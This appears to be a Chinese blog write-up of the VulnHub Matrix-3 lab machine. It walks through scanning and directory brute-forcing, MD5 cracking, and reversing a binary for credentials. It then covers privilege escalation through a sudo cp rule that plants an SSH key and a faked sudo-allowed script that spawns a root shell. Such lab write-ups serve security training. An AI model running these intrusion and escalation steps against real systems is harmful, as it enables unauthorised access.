vulnhub之Matrix-3的实践

admin 2024年12月9日13:20:54评论3 views字数 1297阅读4分19秒阅读模式

本周实践的是vulnhub的Matrix-3镜像,

下载地址,https://download.vulnhub.com/matrix/Machine_Matrix_v3.ova,

用virtualbox导入成功,

做地址扫描,sudo netdiscover -r 192.168.0.0/24,

获取到靶机地址是192.168.0.183,

vulnhub之Matrix-3的实践

接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.183,

发现靶机开了80端口的http服务,6464端口的ssh服务,

7331端口的caldav服务,

vulnhub之Matrix-3的实践

对http服务进行路径暴破,dirb http://192.168.0.183,

获取到http://192.168.0.183/assets,

vulnhub之Matrix-3的实践

浏览器访问http://192.168.0.183/assets,

获取到http://192.168.0.183/Matrix,

vulnhub之Matrix-3的实践

浏览器访问http://192.168.0.183/Matrix,获取到secret.gz,

vulnhub之Matrix-3的实践

下载wget http://192.168.0.183/Matrix/n/e/o/6/4/secret.gz,

查看文件类型,file secret.gz,查看文件内容cat secret.gz,

获取到admin:76a2173be6393254e72ffa4d6df1030a,

vulnhub之Matrix-3的实践

在线进行md5破解,获取到passwd,

vulnhub之Matrix-3的实践

浏览器访问http://192.168.0.183:7331,使用admin/passwd登录,

vulnhub之Matrix-3的实践

进行路径暴破,dirb http://192.168.0.183:7331 -u admin:passwd,

获取到http://192.168.0.183:7331/data,

vulnhub之Matrix-3的实践

继续访问并下载http://192.168.0.183:7331/data/data,

vulnhub之Matrix-3的实践

查看文件类型file data,是个windows的可执行文件,

vulnhub之Matrix-3的实践

安装sudo apt install ghidra,dump文件获取到guest:7R1n17yN30,

vulnhub之Matrix-3的实践

ssh登录,ssh [email protected] -p6464 -t "bash --noprofile"

sudo -l查看到(trinity) NOPASSWD: /bin/cp,

直接在靶机里制作ssh登录密钥,ssh-keygen,cd .ssh,

chmod 777 id_rsa.pub,cp id_rsa.pub /home/guest,cd ..,

sudo -u trinity /bin/cp id_rsa.pub /home/trinity/.ssh/authorized_keys,

用ssh密钥重新登录,ssh [email protected] -i id_rsa -p6464,

vulnhub之Matrix-3的实践

sudo -l查看到(root) NOPASSWD: /home/trinity/oracle,

在靶机上直接制作假的oracle文件,echo "/bin/sh" > oracle,

chmod 777 oracle,执行sudo ./oracle,id确认是root,

vulnhub之Matrix-3的实践

原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之Matrix-3的实践

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月9日13:20:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub之Matrix-3的实践https://cn-sec.com/archives/3485117.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息